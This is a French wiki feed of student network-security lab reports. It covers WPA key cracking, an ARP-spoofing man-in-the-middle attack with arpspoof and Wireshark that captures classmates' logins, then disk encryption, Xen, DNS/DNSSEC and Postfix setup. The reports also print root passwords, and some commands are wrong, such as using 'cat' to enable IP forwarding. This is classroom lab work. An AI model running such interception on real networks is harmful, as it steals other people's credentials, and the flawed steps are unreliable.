                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Gandi-t%C3%A9l%C3%A9chargement_clefetcertifica_mirage.png&amp;diff=53948</id>
		<title>Fichier:Gandi-téléchargement clefetcertifica mirage.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Gandi-t%C3%A9l%C3%A9chargement_clefetcertifica_mirage.png&amp;diff=53948"/>
				<updated>2020-11-20T10:00:40Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : Aglaine a téléversé une nouvelle version de Fichier:Gandi-téléchargement clefetcertifica mirage.png&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Gandi-t%C3%A9l%C3%A9chargement_clefetcertifica_mirage.png&amp;diff=53947</id>
		<title>Fichier:Gandi-téléchargement clefetcertifica mirage.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Gandi-t%C3%A9l%C3%A9chargement_clefetcertifica_mirage.png&amp;diff=53947"/>
				<updated>2020-11-20T09:58:14Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : Aglaine a téléversé une nouvelle version de Fichier:Gandi-téléchargement clefetcertifica mirage.png&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=53944</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=53944"/>
				<updated>2020-11-20T09:48:47Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Envoie du SSL Certification Gandi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on tajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une paserell doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interfacte avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comem ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du réseau===&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
On peux maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
Glue records fournis par gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié nottre dns a une ip, il faur renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas gandi ne pourras pas liée les dns a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveuyrs de non configurer, on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon nottre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commancer, on crée un repertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les rennomer pouyr plus de transparance.&lt;br /&gt;
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a gandi comme montrer ci-dessous en n'oubliant pas de selectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le dns et représanter la chaine d'autentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une méchagerie===&lt;br /&gt;
====Configuration de Postfix====&lt;br /&gt;
Pour recevoir le mail de vérfication de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenètre de configuration s'ouver. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
